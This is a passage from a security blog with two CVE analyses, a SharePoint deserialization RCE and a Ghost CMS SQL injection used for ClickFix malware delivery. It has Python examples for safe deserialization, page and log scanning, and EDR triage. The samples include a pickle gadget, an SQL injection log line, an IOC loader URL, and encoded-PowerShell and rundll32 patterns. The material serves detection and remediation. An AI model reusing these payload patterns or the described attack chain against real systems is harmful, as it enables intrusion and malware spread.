APT groups and financially motivated cybercriminals consistently target on-premises Microsoft SharePoint environments, largely because organizations struggle to keep these systems fully patched, properly configured, and consistently monitored. Legacy integrations, outdated software, and excessive privileges often present exploitable security gaps. For additional context on another critical SharePoint vulnerability, consider reviewing our post on CVE-2026-32201, a SharePoint spoofing vulnerability that also required urgent patching.

### Exploitation Chain of CVE-2026-45659

The exploitation chain for CVE-2026-45659 begins with an authenticated attacker possessing a minimum of Site Member permissions on the target SharePoint Server.
This initial authentication requirement differentiates it from unauthenticated vulnerabilities but does not make it significantly harder for a determined attacker, since internal or compromised credentials can satisfy the precondition. The attack vector is network-based, meaning the vulnerability can be triggered over the network without physical access to the server.

The core of the vulnerability lies in the deserialization of untrusted data within Microsoft Office SharePoint. Deserialization is the process of converting a stream of bytes back into an object in memory. Insecure deserialization occurs when an application deserializes data from an untrusted source without verifying its integrity or authenticity. An attacker can craft a malicious serialized payload that, when processed by the vulnerable SharePoint component, leads to arbitrary code execution. Such a payload effectively "tricks" SharePoint into executing code the attacker specifies, enabling them to run commands remotely on the underlying server.

Microsoft has characterized the attack complexity as low, indicating that an attacker does not need extensive prior knowledge of the system's internals or highly specialized skills to devise an effective exploit. The vulnerability requires no user interaction: once the malicious payload is delivered to the vulnerable component, no user needs to click a link, open a file, or take any other action for the exploit to succeed. The low privileges required also ease exploitation, as an attacker does not need administrative rights to initiate the attack. These factors allow repeatable success with the payload against the vulnerable component, which makes CVE-2026-45659 a significant threat despite the lack of public exploitation reports to date.
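The deserialization problem the chain above describes is easier to reason about in code. The following is an added example, not SharePoint's or Microsoft's code and not specific to .NET: it contrasts a loader that hands an untrusted byte stream to a format whose deserializer can instantiate arbitrary types (Python's pickle, standing in for any such format) with a hardened loader that first authenticates the bytes with an HMAC and then parses a data-only format against an allowlisted schema. The Gadget class, the key and the document fields are constructed for the demo; the side effect the gadget triggers is a harmless list append.

```python
import hashlib
import hmac
import json
import pickle

# Side effects observed purely as a consequence of deserialising bytes.
CALLS = []


def _side_effect(msg: str) -> str:
    CALLS.append(msg)
    return msg


class Gadget:
    """Stand-in for a 'gadget' class (constructed). Its __reduce__ hook tells
    pickle which callable to invoke on load; here it only records a message."""

    def __reduce__(self):
        return (_side_effect, ("code ran during deserialisation",))


def untrusted_blob() -> bytes:
    """Constructed attacker-style input: a pickled Gadget."""
    return pickle.dumps(Gadget())


def unsafe_load(blob: bytes):
    """Vulnerable pattern: the byte stream itself chooses what gets executed."""
    return pickle.loads(blob)


# ---- hardened alternative ---------------------------------------------------
# 1. Authenticate the serialised bytes (HMAC-SHA256) so only data produced by a
#    holder of the key is accepted at all.
# 2. Parse a data-only format (JSON) and check the result against an allowlist
#    of field names and types before business logic sees it.

TAG_LEN = 32
SCHEMA = {"doc_id": int, "title": str, "tags": list}  # constructed document shape


def safe_dump(obj: dict, key: bytes) -> bytes:
    body = json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return tag + body


def safe_load(blob: bytes, key: bytes) -> dict:
    if len(blob) < TAG_LEN:
        raise ValueError("blob too short to carry an authentication tag")
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("authentication tag mismatch: data not trusted")
    obj = json.loads(body)
    if not isinstance(obj, dict):
        raise ValueError("top-level object must be a dict")
    unexpected = set(obj) - set(SCHEMA)
    if unexpected:
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    for name, typ in SCHEMA.items():
        if name in obj and not isinstance(obj[name], typ):
            raise ValueError(f"field {name!r} has wrong type")
    return obj


def rejected(blob: bytes, key: bytes) -> bool:
    """True when the hardened loader refuses the blob."""
    try:
        safe_load(blob, key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    unsafe_load(untrusted_blob())
    print("vulnerable loader side effects:", CALLS)
    key = b"constructed-demo-key"
    good = safe_dump({"doc_id": 7, "title": "Q2 roadmap", "tags": ["draft"]}, key)
    print("hardened loader accepts authentic data:", safe_load(good, key))
    print("hardened loader rejects pickle blob:", rejected(untrusted_blob(), key))
    tampered = good[:TAG_LEN] + good[TAG_LEN:].replace(b"draft", b"final")
    print("hardened loader rejects tampered data:", rejected(tampered, key))
```

The order of the two checks matters: authenticity is verified before any parsing, so malformed or oversized input never reaches the parser, and the schema allowlist means even an authentic blob can only produce the fields the application expects. The same two ideas (bind trust to a key, not to the byte stream; never let the data name the types to instantiate) are what a .NET fix for a deserialization bug has to achieve.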
The bug's discovery is attributed to a security researcher operating under the name MEOW.

### Which products are affected by CVE-2026-45659?

CVE-2026-45659 affects Microsoft SharePoint Server. The research findings indicate that the vulnerability is present in general "SharePoint Server" environments, with particular emphasis on "on-premises SharePoint deployments." The provided research does not specify the version numbers or cumulative updates affected by CVE-2026-45659. Organizations should refer to the official Microsoft Security Response Center (MSRC) update guide for CVE-2026-45659 to identify the exact product versions and the updates that mitigate this vulnerability. The broad mention of SharePoint Server implies that multiple versions or configurations of the on-premises product could be at risk.

### Detection for CVE-2026-45659

The research findings do not provide specific detection guidance such as log signatures, Indicators of Compromise (IOCs), EDR queries, or network indicators tailored to CVE-2026-45659. For remote code execution vulnerabilities, detection typically relies on monitoring for anomalous process creation, unusual network connections originating from the SharePoint Server, or suspicious file modifications. Organizations should implement full logging and monitoring for their SharePoint Server environments. This includes:

- **System and Application Event Logs:** Scrutinize SharePoint ULS logs and Windows Event Logs (System, Security, Application, and particularly the PowerShell operational logs if PowerShell is used in exploits) for error messages, unexpected process creations, or unusual activity originating from the SharePoint service accounts.
- **Network Traffic Analysis:** Monitor network traffic to and from SharePoint Server for unusual protocols, connections to unknown external IP addresses, or large data transfers that could indicate data exfiltration.
- **Endpoint Detection and Response (EDR) Systems:** EDR solutions can detect post-exploitation activity, such as suspicious command execution, unauthorized file access, or privilege escalation attempts that might follow a successful RCE.
- **File Integrity Monitoring (FIM):** Implement FIM on critical SharePoint directories and configuration files to detect unauthorized changes that could indicate compromise.

While direct IOCs are not available from the provided research, strong security monitoring on SharePoint Server instances is crucial for identifying exploitation attempts or post-exploitation activity related to CVE-2026-45659 or similar threats.

### Remediation for CVE-2026-45659

The primary and most critical remediation step for CVE-2026-45659 is immediate application of the patch provided by Microsoft.

- **Apply Microsoft's Out-of-Band Patch:** Organizations operating SharePoint Server should promptly deploy the out-of-band patch Microsoft issued for CVE-2026-45659. The patch addresses the deserialization of untrusted data and prevents remote code execution. Administrators should consult the official Microsoft Security Response Center (MSRC) update guide for CVE-2026-45659 to obtain the correct security updates for their SharePoint Server versions and apply them without delay.
- **Regular Patching and Update Management:** Beyond this immediate patch, maintain a consistent and timely patch management strategy for all SharePoint Server deployments, including all subsequent monthly security updates, to ensure continuous protection against newly discovered vulnerabilities.
- **Security Configuration Review:** Review and enforce least-privilege principles for all SharePoint user and service accounts. Ensure that accounts, particularly those with Site Member permissions, are not over-privileged.
- **Network Segmentation and Access Control:** Isolate SharePoint Server instances within network segments to restrict unauthorized access, and apply strict network access controls that limit communication paths to and from the server to those strictly necessary for its function.
- **Enhanced Monitoring:** Implement and continuously review SharePoint Server logs for anomalous behavior, including unexpected process executions, unusual network connections, or modifications to critical system files, any of which could indicate a successful exploit attempt or post-exploitation activity.

### Technical Takeaways

- CVE-2026-45659 is a critical Remote Code Execution (RCE) vulnerability in Microsoft SharePoint Server with a CVSS score of 8.8.
- The vulnerability is rooted in insecure deserialization of untrusted data, enabling an authenticated attacker with Site Member permissions to execute arbitrary code remotely.
- Attack complexity is low, requiring no user interaction and only minimal privileges, which allows repeatable exploitation against vulnerable components.
- Despite Microsoft's "less likely to exploit" assessment, an out-of-band patch was released, showing that the vendor regards CVE-2026-45659 as a significant risk given SharePoint's history as a high-value target for nation-state actors and ransomware groups.
- Immediate application of Microsoft's patch is the primary remediation; the research does not specify affected versions beyond general "SharePoint Server" or provide specific detection guidance.
---

## CVE-2026-26980: Ghost CMS SQL Injection (CVSS 9.4)

- URL: https://purple-ops.io/blog/cve-2026-26980-ghost-sql-injection
- Date: 2026-05-27
- Category: CVE Analysis
- Tags: cve-2026-26980, ghost-cms, sql-injection, active-exploitation, clickfix
- Reading time: 9 min | CVSS: 9.4

**Summary:** Ghost CMS CVE-2026-26980, a critical SQL injection (CVSS 9.4), is actively exploited to steal API keys and inject malware onto 700+ websites.

CVE-2026-26980 (CVSS 9.4) Ghost SQL Injection Actively Exploited

Threat actors are actively exploiting CVE-2026-26980, a critical SQL injection vulnerability in Ghost CMS versions prior to 6.19.1. The vulnerability, with a CVSS score of 9.4, lets unauthenticated attackers read arbitrary data from the database, including administrative API keys. Its severity is heightened by ongoing exploitation, first detected on May 7, 2026. Exploitation targets over 700 websites globally, in sectors such as universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology. The campaign injects malicious JavaScript into compromised Ghost CMS articles, which redirects visitors through traffic distribution systems before delivering Windows malware.

This analysis details CVE-2026-26980, its exploitation chain, and guidance for detection and remediation. Organizations using Ghost CMS should apply the recommended patches and security measures to reduce exposure.

### Impact

CVE-2026-26980 gives an unauthenticated attacker unauthorized data access, specifically to the Ghost CMS admin API key. With this key, threat actors can directly modify articles published on the content management system, leading to widespread site poisoning. The primary objective observed is injecting malicious JavaScript loaders into compromised pages, which then start ClickFix attacks.
The campaign affects over 700 websites in sectors such as universities, blockchain, artificial intelligence, SaaS, security research, media, and financial technology, where trust and data integrity matter. Compromised sites face immediate defacement and pose a significant risk to visitors. Users accessing infected pages are subjected to a multi-stage attack that begins with a fake CAPTCHA verification and ends with malicious commands executing on their Windows systems. The outcome is delivery of Windows executables designed for persistence and remote control, turning legitimate web properties into channels for malware distribution. Compromising reputable websites further increases the success rate of these attacks by trading on inherent user trust.

### How CVE-2026-26980 Facilitates Attacks

CVE-2026-26980 is an SQL injection vulnerability in Ghost CMS's Content API. It is critical because it allows an unauthenticated attacker to read arbitrary data from the database. The first step in the exploitation chain uses this vulnerability to steal a target site's Admin API Key without authorization. That key grants control over the Ghost Admin API, enabling an attacker to perform actions normally reserved for legitimate administrators.

After acquiring the Admin API Key, threat actors tamper with articles in bulk across the compromised Ghost CMS instance, injecting malicious JavaScript loaders at the bottom of web pages. Our prior analysis of similar techniques, for example our analysis of React2Shell CVEs and AI scams, shows the effectiveness of client-side script injection for initial compromise. The injected JavaScript acts as a two-stage loader designed to retrieve the main payload from an external domain: clo4shara[.]xyz/11z77u3.php. This modular architecture lets attackers change payloads dynamically while keeping the same loader across many compromised sites.
For more on SQL injection vulnerabilities in content management systems, refer to our analysis of a Drupal SQL injection vulnerability.

The external PHP script hosted on clo4shara[.]xyz functions as a traffic distribution system powered by Adspect, a commercial cloaking service. The script collects browser fingerprint information and uses cloaking to separate intended victims from security scanners or crawlers, so that only intended targets receive the actual malicious payload. It supports 19 different commands, allowing the threat actor to execute arbitrary JavaScript and maintain remote control over the victim's browser. Malicious JavaScript for payload delivery is a common technique, as explored in our post on an Exchange Cross-Site Scripting (XSS) zero-day.

Victims identified as targets see a fake CAPTCHA verification page within an iframe. Through social engineering, the page instructs users to copy and paste a Base64-encoded command into the Windows Run dialog. The command acts as a dropper, retrieving and extracting a ZIP archive. Inside the archive, a Windows batch script runs a PowerShell command that downloads a DLL from a remote domain and launches it using rundll32.exe, while a bogus web page opens simultaneously as a distraction. Later versions of the attack replaced the DLL payload with a JavaScript payload, but the goal remains dropping a Windows executable. The observed executables include a PuTTY client with a valid code-signing certificate and a modified Inno Setup installer for an Electron application. That application, a tampered version of the open-source Grape desktop client, achieves persistence and polls a remote server, web-telegram[.]ug, every 30 seconds for further instructions, including executing additional JavaScript code or executable files.

### Which Ghost CMS Versions Are Affected?
CVE-2026-26980 affects specific Ghost CMS versions; the flaw was fixed in version 6.19.1.

- Affected product line: Ghost CMS
- Affected versions: all versions prior to 6.19.1

Organizations running any Ghost CMS instance older than 6.19.1 are vulnerable to this SQL injection and the associated ClickFix attacks.

### Detection Strategies for CVE-2026-26980

Detecting CVE-2026-26980 exploitation and the subsequent ClickFix attacks requires a multi-layered approach covering web application logs, network traffic, and endpoint activity.

**Web Application and Server Logs**

- Monitor Ghost CMS access logs for unusual requests to the Content API, especially those indicating SQL injection attempts or unauthorized access patterns.
- Examine Ghost CMS audit logs for unauthorized modifications to articles or templates, specifically bulk changes or insertions of new script tags.
- Analyze HTTP server access logs for requests from potentially compromised Ghost instances to external domains such as clo4shara[.]xyz or web-telegram[.]ug.
- Look for POST requests containing Base64-encoded commands or unusual parameters that might indicate an attacker using the Admin API.

**Network Indicators (IOCs)**

- Domains:
  - clo4shara[.]xyz (malicious JavaScript loader and traffic distribution)
  - web-telegram[.]ug (command and control for the Grape desktop client)
- IP Addresses: Monitor DNS queries and network connections to IP addresses associated with these domains.
- Traffic Patterns: Look for outbound HTTP/HTTPS connections from internal networks to the listed malicious domains, especially from user workstations, and identify traffic associated with unexpected file downloads (ZIP archives, DLLs, executables).
- Proxy/Firewall Logs: Configure firewalls and proxies to block or alert on connections to the identified malicious domains.
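A worked version of the web-side checks above, added here as an example rather than code from the original post or from Ghost: one function scans a rendered article for script tags that load from the listed IOC domains, from hosts outside the site's own allowlist, or whose inline body references an IOC domain, and reports whether the tag sits near the bottom of the page; a second function triages Common Log Format access-log lines for Content API requests whose URL-decoded query carries SQL keywords. The HTML, the allowlist (cdn.example-analytics.net), the log lines and the /ghost/api/content/ path prefix are constructed or assumed; tune the prefix, the allowlist and the keyword hints to your deployment.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlsplit

# Domains from the IOC list above, kept defanged and refanged only for matching.
IOC_DOMAINS = ("clo4shara[.]xyz", "web-telegram[.]ug")
# Hosts this (constructed) site legitimately loads scripts from.
ALLOWED_HOSTS = {"cdn.example-analytics.net"}


def refang(domain: str) -> str:
    return domain.replace("[.]", ".")


def _matches_ioc(host: str) -> bool:
    return any(host == refang(d) or host.endswith("." + refang(d)) for d in IOC_DOMAINS)


class ScriptCollector(HTMLParser):
    """Collect every <script> element with its line number, src and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = {"line": self.getpos()[0], "src": dict(attrs).get("src"), "body": ""}
            self.scripts.append(self._open)

    def handle_data(self, data):
        if self._open is not None:
            self._open["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._open = None


def scan_article_html(html: str, allowed_hosts: set) -> list:
    """Return (reason, host_or_'inline', line, near_bottom) for suspicious scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    last_line = html.count("\n") + 1
    findings = []
    for s in parser.scripts:
        host = urlsplit(s["src"]).hostname if s["src"] else None
        reason = None
        if host and _matches_ioc(host):
            reason = "script loaded from known IOC host"
        elif host and host not in allowed_hosts:
            reason = "script loaded from host outside allowlist"
        elif host is None and any(refang(d) in s["body"] for d in IOC_DOMAINS):
            reason = "inline script references IOC domain"
        if reason:
            findings.append((reason, host or "inline", s["line"], s["line"] >= last_line - 3))
    return findings


# Ghost serves its Content API under /ghost/api/content/ (assumed; adjust to your
# deployment). The hints are coarse triage signals, not a signature set.
CONTENT_API = "/ghost/api/content/"
SQLI_HINTS = re.compile(r"union\s+select|sleep\s*\(|--(?:\s|$)|/\*", re.IGNORECASE)
# Common Log Format: ip ident user [ts] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """Return (ip, reason, raw_path) for Content API requests carrying SQL hints."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m["path"])
        if decoded.startswith(CONTENT_API) and SQLI_HINTS.search(decoded):
            hits.append((m["ip"], "SQL keywords in Content API request", m["path"]))
    return hits


# Constructed sample input (not a real capture): a post with one unexpected
# external script and one inline loader referencing an IOC domain at the bottom.
SAMPLE_HTML = """<!doctype html>
<html><head><script src="/assets/built/casper.js"></script></head>
<body>
<article><h1>Post</h1><p>Body text.</p></article>
<script src="https://cdn.example-analytics.net/tag.js"></script>
<script src="https://static.example-unknown.org/loader.js"></script>
<script>(function(){var u="https://clo4shara.xyz/11z77u3.php";})();</script>
</body></html>"""

SAMPLE_LOG = [  # constructed lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
    '203.0.113.9 - - [07/May/2026:10:15:01 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug:%27%20UNION%20SELECT%201 HTTP/1.1" 500 312',
    '198.51.100.4 - - [07/May/2026:10:15:02 +0000] "GET /ghost/api/content/posts/?key=abc&limit=5 HTTP/1.1" 200 8812',
    '203.0.113.9 - - [07/May/2026:10:15:03 +0000] "GET /about/ HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for f in scan_article_html(SAMPLE_HTML, ALLOWED_HOSTS):
        print("html:", f)
    for h in scan_access_log(SAMPLE_LOG):
        print("log: ", h)
```

Run the HTML scan against the rendered output of each post (the injected loader lives in the stored article content, so the admin API or a crawl of the public site both work as input) and diff the findings over time; a script host that is new since the last crawl is the signal, not the absolute count. A bare quote is deliberately not a hint on its own, because Ghost filter syntax uses quotes legitimately and it would flood the log scan with noise.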
**Endpoint Detection and Response (EDR) / SIEM Queries**

- Process Execution Anomalies:
  - Detect instances of cmd.exe or powershell.exe launched with Base64-encoded commands, especially in association with browser processes.
  - Monitor for rundll32.exe executing unusual DLL files from non-standard directories or external network locations.
  - Look for the creation and execution of .bat or .ps1 scripts in temporary directories following web browser activity.
- File System Activity:
  - Monitor for new ZIP archives, DLLs, or executables created in user download directories or temporary folders that are not associated with legitimate software installations.
  - Identify installation of the "Grape desktop client" or "PuTTY client" via unexpected installation paths or without user initiation, particularly if they show unusual network activity.
- Registry/Persistence: Detect new or modified registry keys related to startup items, scheduled tasks, or services that provide persistence for the modified Grape desktop client or other malware.
- Network Connections from Endpoints: Alert on network connections from powershell.exe, rundll32.exe, or the Grape desktop client to the C2 domain web-telegram[.]ug.

**Content Monitoring and Web Scanners**

Regularly scan Ghost CMS instances for injected JavaScript code, especially at the bottom of article pages. Look for
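The process and network items in the EDR/SIEM list above, and the equivalent guidance in the SharePoint detection section earlier on this page (unexpected process creations and unusual outbound connections), are shown here as triage logic over constructed telemetry. This is an added example, not code from the original post or from any EDR product. The ProcessEvent and NetworkEvent records, the file paths and the Grape.exe process name are constructed, the domain list is refanged from the IOCs above, and the browser and system-directory lists are assumptions to adjust for your environment.

```python
import base64
import re
from dataclasses import dataclass

# Refanged from the IOC list above; keep the defanged form in your intel platform.
C2_DOMAINS = {"web-telegram.ug", "clo4shara.xyz"}
# Assumed lists; extend for your estate.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 token
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class NetworkEvent:
    image: str
    dest_host: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return it or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def rundll32_dll_path(command_line: str) -> str:
    """Extract the DLL argument from 'rundll32 <dll>,<entry>' (lower-cased, unquoted)."""
    parts = command_line.split(None, 1)
    if len(parts) < 2:
        return ""
    return parts[1].split(",", 1)[0].strip().strip('"').lower()


def triage_process(ev: ProcessEvent) -> list:
    """Return (reason, detail) findings for one process-creation event."""
    findings = []
    name = _basename(ev.image)
    parent = _basename(ev.parent_image)
    if name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append(("encoded PowerShell command", decoded))
    if name == "rundll32.exe":
        dll = rundll32_dll_path(ev.command_line)
        if dll and not dll.startswith(SYSTEM_DIRS):
            findings.append(("rundll32 loading DLL from non-standard path", dll))
    if name in SHELLS and parent in BROWSERS:
        findings.append(("shell spawned by a browser process", parent))
    return findings


def triage_network(ev: NetworkEvent) -> list:
    """Flag connections to a listed C2 domain or any of its subdomains."""
    host = ev.dest_host.lower().rstrip(".")
    if any(host == d or host.endswith("." + d) for d in C2_DOMAINS):
        return [("connection to listed C2 domain", f"{_basename(ev.image)} -> {host}")]
    return []


def _encode_ps(text: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects (constructed sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample telemetry, not real captures.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc " + _encode_ps("Write-Host demo")),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe "C:\Users\u\AppData\Local\Temp\x1\loader.dll",Start'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c whoami"),
]
SAMPLE_NETWORK_EVENTS = [
    NetworkEvent(r"C:\Users\u\AppData\Local\Programs\grape\Grape.exe", "web-telegram.ug"),
    NetworkEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "www.example.org"),
]


def run_triage() -> list:
    results = []
    for ev in SAMPLE_PROCESS_EVENTS:
        results.extend(triage_process(ev))
    for ev in SAMPLE_NETWORK_EVENTS:
        results.extend(triage_network(ev))
    return results


if __name__ == "__main__":
    for reason, detail in run_triage():
        print(f"{reason}: {detail}")
```

Decoding the encoded command at triage time is what turns a generic "encoded PowerShell" alert into something an analyst can act on; the decoded text, the DLL path and the destination host are the fields to surface in the alert. Note that the benign rundll32 event (shell32.dll from System32) and the browser's ordinary web traffic produce no findings, which is the false-positive floor this logic is meant to hold.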